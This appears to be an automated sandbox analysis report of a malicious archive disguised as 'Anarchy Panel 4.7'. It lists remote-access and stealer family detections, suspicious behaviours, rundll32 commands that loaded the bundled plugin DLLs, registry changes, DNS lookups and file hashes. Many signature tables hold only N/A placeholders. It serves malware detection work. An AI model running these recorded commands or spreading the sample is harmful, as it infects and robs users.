Analysis Overview
SHA256
d531f8fe97a22396c8569bc48eea4a808f36631466770d170095ffcc41c50f0e
Threat Level: Known bad
The file s.rar was found to be: Known bad.
Malicious Activity Summary
Async RAT payload
Stealerium family
Suspicious use of NtCreateUserProcessOtherParentProcess
StormKitty payload
Rhadamanthys
Stormkitty family
Detect rhadamanthys stealer shellcode
Asyncrat family
Blocklisted process makes network request
Drops file in Drivers directory
Downloads MZ/PE file
Stops running service(s)
Executes dropped EXE
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Drops file in System32 directory
Suspicious use of SetThreadContext
Launches sc.exe
Unsigned PE
Program crash
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-07-19 00:36
Signatures
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Asyncrat family
Stealerium family
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stormkitty family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral21
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win7-20230712-en
Max time kernel
1563s
Max time network
1567s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\RssCnLKcGRxj.dll",#1
Network
Files
Analysis: behavioral27
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win7-20230712-en
Max time kernel
1561s
Max time network
1565s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\fzAgyDYa.dll",#1
Network
Files
Analysis: behavioral30
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win10v2004-20230703-en
Max time kernel
802s
Max time network
1131s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\mGWHaG2Jn.dll",#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.77.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral31
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win7-20230712-en
Max time kernel
1559s
Max time network
1564s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\mML6WKMqdxjDGA.dll",#1
Network
Files
Analysis: behavioral3
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win7-20230712-en
Max time kernel
1559s
Max time network
1562s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 20805a37d9b9d901 | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "396491998" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{61B24061-25CC-11EE-A97A-5E587CD0922C} = "0" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000081fc177b9287ed4a8181eac127bbbd69000000000200000000001066000000010000200000001cf0b4088ed36ad859cc95f6426934e3b4cc014dbaee2abccc48d757cebbe47c000000000e8000000002000020000000764f810b931477111a3c83e8d70260f44da3b229f34dad71c9619edac74f2c17200000003482da31c59790cb62cc00fc2fa41408aa84820fd84ce5ae0a9ad0326ef82a43400000004e81a7c147764b7abd43dec19c0d79b4157602e7c9cff3e768859f294684576a6c360ec0ca8d4b245baa62fd575d22d599404e720fef31efaeab55d52b2ededd | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000081fc177b9287ed4a8181eac127bbbd690000000002000000000010660000000100002000000004fd83efa4fd8c76d1131590788f96459fed7d6597d61f66dd337c7584dd8b69000000000e8000000002000020000000c67e0f6964abfb0c0f5e8e36c6ea46647252240da6fa482204566e52364e1cb390000000a90a9faa5863949da0403cc56c259ddf63762eee35268f4d9aa15422875417b03784ec3fe20d563c92869659d8a328d3a982709eabd9cab72458b951b928993f725f50cf8537ac108776dc8b05e53f865e7b29dfa8d734d8d8389d8efebc5c2ad0a95b218df812635f648df5f8b1f351ad298bc7f6e9b01643b319bcbb7485e517898b5cf16a4d2ea7fe3b75df18019b400000002eebcff836935ef55c31b97ef2ed91c3674cf3d0bfb459ff8f87591883b0d5e0b47ec508dd6327d757b9fa3d7016f2da1dd997990006f2f442b4ef3a1eff068e | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe.xml"
C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
C:\Program Files\Internet Explorer\IEXPLORE.EXE
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" -nohome
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2984 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab9741.tmp
| MD5 | 3ac860860707baaf32469fa7cc7c0192 |
| SHA1 | c33c2acdaba0e6fa41fd2f00f186804722477639 |
| SHA256 | d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904 |
| SHA512 | d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c |
C:\Users\Admin\AppData\Local\Temp\Tar985F.tmp
| MD5 | 4ff65ad929cd9a367680e0e5b1c08166 |
| SHA1 | c0af0d4396bd1f15c45f39d3b849ba444233b3a2 |
| SHA256 | c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6 |
| SHA512 | f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 7cd10d63c58abab932977b550be96c7d |
| SHA1 | 070d242fc171a0e46f1f6c17a105669a7c0f7212 |
| SHA256 | cbb44dd4d858e5ec9a83a8a8f3036e3b3e360e3de296a324d2f163bb617fa195 |
| SHA512 | 79dda8cd8417a28807dec51fe2b9495268e7d1e88b4ab383e62baba46ae9678a8a39d2240da799996bfbdf7b8831ae16a6ff4920d697714a866d707d7e577939 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f94c9f0396b1ec6520a853dabbd8e183 |
| SHA1 | d41d58279f017a060aeea7ca4df39b41b976070c |
| SHA256 | 5147e09fc1796c0daee9b64b27c66b15b97b727c124704888d8d2cd023de7052 |
| SHA512 | f22e57ca79e0692c85434cb8942d1d21b281859a4fc6663552ad5a99d785e24fbe70002a1d17e4e3bd80125299f28d9ab0326700e3e9c2cf38cbbe24de2c82b1 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 96e309b7e1715574a74bcd21e3d64bbf |
| SHA1 | 376f2419e8812ead26141871331abe92ce4416f4 |
| SHA256 | 8b853a9863a87254514bd5e5d8161ca44575aa937ef4b07dd935765f4ac11caf |
| SHA512 | 8329825df35a1ea9b159d1066c6e3f1bba11ba4532aba684b0ccdd7e03569005e2867fbdf5a2f3698361cde0aca3e49dd5d16ab80996df84238d942103c6fc35 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d063a2a6a109e637c29793d143a8523c |
| SHA1 | b5b59967737a6b6528b01d0b2372bab8b335f281 |
| SHA256 | 97e96c10bd3b0ca4968718bc49a7349f39359608989809c37de4fc3e6ac27fce |
| SHA512 | aeb3a34903f3d73c8a4f79a0b774571826c29ff726d4020c231824ee30e0d6c8bef1801f644102792b4c864de9a39572d5f864bd44ddf6b3756c212e966f1130 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 812b1fd65e07405b366c61df99f4e585 |
| SHA1 | 0dfbeee834646ca59f3ad311a94fe62efab4c905 |
| SHA256 | 77197e7b937ea5eba4f3af471c9f9282c7302c23d1837fe062ec396c9a4b8b24 |
| SHA512 | b23dc73346b8773326a75482f2852d3925d966b1d16ea96b08aa92b56320db596c6a1da86b3dc91cff4305ccdd27c9132ed5cb9c6e92c40c80ffdd0ece6d104a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 719d7eb33c44ad7b08b6d8fdad8c1b2b |
| SHA1 | 80452aa5e8e6348fd4cb3b9c7bb1230ae37ebd94 |
| SHA256 | 0a20f303b6a073798dcd56f0046f8a1cf2710414f260800599b069959ea6b5d6 |
| SHA512 | 3cf8e907308d02246c2df7b5b7cfc0e44c24f633a85e4d22b17564101f92b2cb05de93aed1bcd152556202b85f6eafd23cc69b02ec4290cfab0bb4ccb75c6da5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 01bcf6985ccdc4e3d11bbd2ffec444a5 |
| SHA1 | 022e2cfacbb800cca63d43397576b60ff296902f |
| SHA256 | dfa0bfebc992dd7a6586942df2d05d5a3706bd871e478d5c8a2cc0c366dd3710 |
| SHA512 | 92e4da814d55004ef1af3d7bb10d5cd110423a781ea227ec7d8ebf02d5b8210b17aa26b6f96ff0fb8f7573dd87c23411b92009632948a2cdbfdc9df368df9f87 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 92b8b0c8a144d74c1cdcc8586e2dc523 |
| SHA1 | f9c4f6d7e7a416202d95c15fe605fe499e85f20c |
| SHA256 | 1df741becf2fa9f9ad0029c401876fec8531e3482bff5604e1d7eba2ce773950 |
| SHA512 | fd47a0305caca4a03d581ca596023869410ab584e7c494716f7270c3b6c260a8e05439992462fd6f27019640901c9ccf630342542a47ee3b621d188bbdf734d3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 91aad0c4911713ddaf4f95024a9c12f5 |
| SHA1 | 2a29446efef296239a12ce5bee3d14a5f880fee3 |
| SHA256 | 665f19b0cd501aac7606ad802beb7640dae14a32e160f2013773f41379aab533 |
| SHA512 | 84e35749533d1402ac3fd8fd65ca372842ef02b9fb93bf872ba616999752cfe6470771cf70b520ce19c4043c8a308949245b58447521ec2784799ee26ed8c1a5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\977QBXKR\suggestions[1].en-US
| MD5 | 5a34cb996293fde2cb7a4ac89587393a |
| SHA1 | 3c96c993500690d1a77873cd62bc639b3a10653f |
| SHA256 | c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad |
| SHA512 | e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\WMIXVVC4.txt
| MD5 | 358763a5ae28b2285b8c691688a9286e |
| SHA1 | 7d2cfa62517e614f0523595748188e2f25cbe718 |
| SHA256 | b5297fe487bfa7911d9e18632f0c3bd5fa73c0a708943fffb54da8fdbba6c29f |
| SHA512 | e0d2f629d3db1bb0d48a82f74b6d15db577a35220ff43861802e102f5dcac69277cb076a9daf92f1c78325b8a49f53d7fef965a411def630f8e67945a78cadec |
Analysis: behavioral17
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win7-20230712-en
Max time kernel
1561s
Max time network
1564s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\KNTmoSnG.dll",#1
Network
Files
Analysis: behavioral18
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win10v2004-20230703-en
Max time kernel
1158s
Max time network
1164s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\KNTmoSnG.dll",#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.74.101.95.in-addr.arpa | udp |
Files
Analysis: behavioral23
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win7-20230712-en
Max time kernel
1558s
Max time network
1564s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\WkUP83aP9CABpi.dll",#1
Network
Files
Analysis: behavioral5
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win7-20230712-en
Max time kernel
1561s
Max time network
1565s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\0guo3zbo66fqoG.dll",#1
Network
Files
Analysis: behavioral11
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win7-20230712-en
Max time kernel
1563s
Max time network
1566s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\EVa7gBMKoaHmLC.dll",#1
Network
Files
Analysis: behavioral13
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win7-20230712-en
Max time kernel
1560s
Max time network
1564s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\FBSyChwp.dll",#1
Network
Files
Analysis: behavioral24
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win10v2004-20230703-en
Max time kernel
828s
Max time network
1166s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\WkUP83aP9CABpi.dll",#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.120.234.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.13.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win10v2004-20230703-en
Max time kernel
1745s
Max time network
1159s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE |
Processes
C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE
"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe.xml"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 428 -p 2684 -ip 2684
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2684 -s 448
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.120.234.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.77.109.52.in-addr.arpa | udp |
